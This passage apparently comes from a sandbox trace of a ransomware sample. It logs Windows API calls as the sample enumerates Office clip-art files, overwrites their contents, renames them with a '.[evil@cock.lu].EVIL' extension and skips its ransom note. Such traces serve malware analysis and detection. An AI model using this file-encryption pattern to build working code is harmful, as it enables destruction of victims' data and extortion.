Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf.[evil@cock.lu].evil")) returned 1 [0122.168] ??_V@YAXPEAX@Z () returned 0x1 [0122.171] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF", dwFileAttributes=0x200) returned 0 [0122.171] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.171] wcsstr (_Str="FD01196_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.171] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 69 [0122.171] wcscmp (_String1="FD01196_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.172] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01196_.WMF") returned 0x0 [0122.172] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 0x45 [0122.172] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.174] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x91c, lpOverlapped=0x0) returned 1 [0122.188] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.189] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.189] _errno () returned 0x84b1160840 [0122.189] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.189] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x920, lpOverlapped=0x0) returned 1 [0122.189] CloseHandle (hObject=0x1a8) returned 1 [0122.189] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.189] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.189] __uncaught_exception () returned 0x84b1160800 [0122.189] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.190] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf.[evil@cock.lu].evil")) returned 1 [0122.191] ??_V@YAXPEAX@Z () returned 0x1 [0122.194] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF", dwFileAttributes=0x200) returned 0 [0122.194] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.194] wcsstr (_Str="FD01548_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.194] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 69 [0122.194] wcscmp (_String1="FD01548_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.194] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01548_.WMF") returned 0x0 [0122.194] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 0x45 [0122.194] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.196] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x284c, lpOverlapped=0x0) returned 1 [0122.246] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.246] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.246] _errno () returned 0x84b1160840 [0122.246] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.246] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2860, lpOverlapped=0x0) returned 1 [0122.246] CloseHandle (hObject=0x1a8) returned 1 [0122.246] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.247] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.247] __uncaught_exception () returned 0x84b1160800 [0122.247] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.247] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf.[evil@cock.lu].evil")) returned 1 [0122.248] ??_V@YAXPEAX@Z () returned 0x1 [0122.251] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF", dwFileAttributes=0x200) returned 0 [0122.251] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.251] wcsstr (_Str="FD01657_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.251] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 69 [0122.251] wcscmp (_String1="FD01657_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.251] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01657_.WMF") returned 0x0 [0122.251] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 0x45 [0122.252] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.254] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x76ce, lpOverlapped=0x0) returned 1 [0122.263] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.263] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.263] _errno () returned 0x84b1160840 [0122.263] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.263] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x76e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x76e0, lpOverlapped=0x0) returned 1 [0122.263] CloseHandle (hObject=0x1a8) returned 1 [0122.263] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.264] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.264] __uncaught_exception () returned 0x84b1160800 [0122.264] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.264] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf.[evil@cock.lu].evil")) returned 1 [0122.265] ??_V@YAXPEAX@Z () returned 0x1 [0122.268] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF", dwFileAttributes=0x200) returned 0 [0122.269] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.269] wcsstr (_Str="FD01658_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.269] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 69 [0122.269] wcscmp (_String1="FD01658_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.269] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01658_.WMF") returned 0x0 [0122.269] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 0x45 [0122.269] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.271] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4604, lpOverlapped=0x0) returned 1 [0122.287] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.287] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.287] _errno () returned 0x84b1160840 [0122.287] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.288] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x4620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4620, lpOverlapped=0x0) returned 1 [0122.288] CloseHandle (hObject=0x1a8) returned 1 [0122.288] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.288] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.288] __uncaught_exception () returned 0x84b1160800 [0122.288] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.288] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf.[evil@cock.lu].evil")) returned 1 [0122.292] ??_V@YAXPEAX@Z () returned 0x1 [0122.295] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF", dwFileAttributes=0x200) returned 0 [0122.295] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.295] wcsstr (_Str="FD01659_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.295] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 69 [0122.295] wcscmp (_String1="FD01659_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.295] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01659_.WMF") returned 0x0 [0122.295] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 0x45 [0122.295] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.298] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x79cc, lpOverlapped=0x0) returned 1 [0122.590] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.590] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.590] _errno () returned 0x84b1160840 [0122.590] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.590] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x79e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x79e0, lpOverlapped=0x0) returned 1 [0122.590] CloseHandle (hObject=0x1a8) returned 1 [0122.590] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.591] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.591] __uncaught_exception () returned 0x84b1160800 [0122.591] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.591] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf.[evil@cock.lu].evil")) returned 1 [0122.592] ??_V@YAXPEAX@Z () returned 0x1 [0122.595] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF", dwFileAttributes=0x200) returned 0 [0122.596] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.596] wcsstr (_Str="FD01660_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.596] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 69 [0122.596] wcscmp (_String1="FD01660_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.596] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01660_.WMF") returned 0x0 [0122.596] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 0x45 [0122.596] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.598] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x329e, lpOverlapped=0x0) returned 1 [0122.938] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.938] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.938] _errno () returned 0x84b1160840 [0122.938] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.938] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x32a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x32a0, lpOverlapped=0x0) returned 1 [0122.938] CloseHandle (hObject=0x1a8) returned 1 [0122.938] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.938] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.938] __uncaught_exception () returned 0x84b1160800 [0122.938] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.939] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf.[evil@cock.lu].evil")) returned 1 [0122.939] ??_V@YAXPEAX@Z () returned 0x1 [0122.942] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF", dwFileAttributes=0x200) returned 0 [0122.942] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.942] wcsstr (_Str="FD02068_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.942] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 69 [0122.942] wcscmp (_String1="FD02068_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.942] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02068_.WMF") returned 0x0 [0122.942] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 0x45 [0122.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.944] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9b8, lpOverlapped=0x0) returned 1 [0122.971] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.971] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.971] _errno () returned 0x84b1160840 [0122.971] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.971] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9c0, lpOverlapped=0x0) returned 1 [0122.971] CloseHandle (hObject=0x1a8) returned 1 [0122.971] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.972] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.972] __uncaught_exception () returned 0x84b1160800 [0122.972] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.972] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf.[evil@cock.lu].evil")) returned 1 [0122.973] ??_V@YAXPEAX@Z () returned 0x1 [0122.975] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF", dwFileAttributes=0x200) returned 0 [0122.975] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.975] wcsstr (_Str="FD02071_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.975] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 69 [0122.976] wcscmp (_String1="FD02071_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.976] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02071_.WMF") returned 0x0 [0122.976] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 0x45 [0122.976] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.977] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x88c, lpOverlapped=0x0) returned 1 [0123.052] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.052] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.052] _errno () returned 0x84b1160840 [0123.052] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.052] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x8a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8a0, lpOverlapped=0x0) returned 1 [0123.052] CloseHandle (hObject=0x1a8) returned 1 [0123.052] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0123.053] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0123.053] __uncaught_exception () returned 0x84b1160800 [0123.053] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0123.053] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf.[evil@cock.lu].evil")) returned 1 [0123.054] ??_V@YAXPEAX@Z () returned 0x1 [0123.058] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF", dwFileAttributes=0x200) returned 0 [0123.058] FindNextFileW (in: 